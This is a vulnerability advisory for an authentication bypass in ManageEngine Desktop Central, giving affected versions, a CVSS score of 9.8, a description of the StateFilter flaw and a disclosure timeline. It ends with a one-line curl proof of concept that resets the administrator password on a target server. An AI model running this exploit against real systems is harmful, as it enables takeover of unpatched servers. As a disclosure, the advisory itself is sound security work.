SRC-2022-0001 : Zoho ManageEngine Desktop Central StateFilter Arbitrary Forward Authentication Bypass Vulnerability



CVSS Score:

9.8, (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Affected Vendors:


Affected Products:

ManageEngine Desktop Central and ManageEngine Desktop Central MSP <= 10.1.2137.2

Vulnerability Details:

This vulnerability allows remote attackers to bypass authentication on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the StateFilter class. The issue results from an arbitrary forward during request handling. An attacker can leverage this vulnerability to bypass authentication on the system and reset the administrators password.

Vendor Response:

Zoho has issued an update to correct this vulnerability. More details can be found at:

Disclosure Timeline:

  • 2019-12-12 - Discovered and unreported
  • 2021-12-03 - Patched by Zoho
  • 2022-01-21 - Public release of advisory

Proof of Concept: curl -kb "STATE_COOKIE=&_REQS/_TIME/1337" "https://target.tld:8383/STATE_ID/1337/changeDefaultAmazonPassword?loginName=admin&newUserPassword=haxed" -d ""


This vulnerability was discovered by Steven Seeley of Source Incite